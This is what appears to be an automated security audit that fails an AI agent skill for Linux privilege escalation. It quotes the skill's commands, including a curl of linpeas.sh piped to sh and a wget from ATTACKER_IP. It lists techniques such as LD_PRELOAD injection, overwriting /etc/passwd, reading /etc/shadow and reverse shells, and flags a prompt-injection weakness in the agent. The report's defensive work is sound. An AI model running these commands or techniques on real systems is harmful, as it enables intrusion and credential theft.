Linux Privilege Escalation
Fail
Audited by Gen Agent Trust Hub on Sep 14, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONPRIVILEGE_ESCALATIONDATA_EXFILTRATIONPERSISTENCEEXTERNAL_DOWNLOADSDYNAMIC_EXECUTIONCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to download a script from an external GitHub repository and execute it immediately by piping it to the shell (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh). This pattern bypasses review and allows arbitrary code execution.
- [PRIVILEGE_ESCALATION]: The core functionality focuses on bypassing security controls to gain root access. Techniques include exploiting SUID binaries, using LD_PRELOAD to inject shared libraries, compiling kernel exploits, and overwriting /etc/passwd to create unauthorized root accounts.
- [DATA_EXFILTRATION]: Instructions include commands to access sensitive system files like /etc/shadow and exfiltrate data to an attacker-controlled IP address via reverse shells.
- [PERSISTENCE]: The skill facilitates long-term access by setting up reverse shell listeners and creating new privileged users on the target system.
- [EXTERNAL_DOWNLOADS]: Fetches multiple security scripts and exploit payloads from non-standard external sources and attacker-specified IP addresses (e.g., wget http://ATTACKER_IP:8000/linpeas.sh).
- [DYNAMIC_EXECUTION]: Employs runtime compilation of C source code (gcc exploit.c -o exploit) and dynamic loading of libraries (shell.so) to execute arbitrary payloads on the system.
- [COMMAND_EXECUTION]: Executes a wide variety of shell commands to manipulate system configuration, modify file permissions (chmod +s), and perform environmental hijacking (export PATH=/tmp:$PATH).
- [INDIRECT_PROMPT_INJECTION]: 1. Ingestion points: Processes raw output from system enumeration commands in SKILL.md. 2. Boundary markers: Absent; the skill does not use delimiters or warnings to differentiate between system data and instructions. 3. Capability inventory: Includes full filesystem access, network communication (reverse shells), and binary execution/compilation in SKILL.md. 4. Sanitization: No validation or sanitization is performed on the data ingested from the target system before it influences subsequent exploitation steps.
Recommendations
- HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata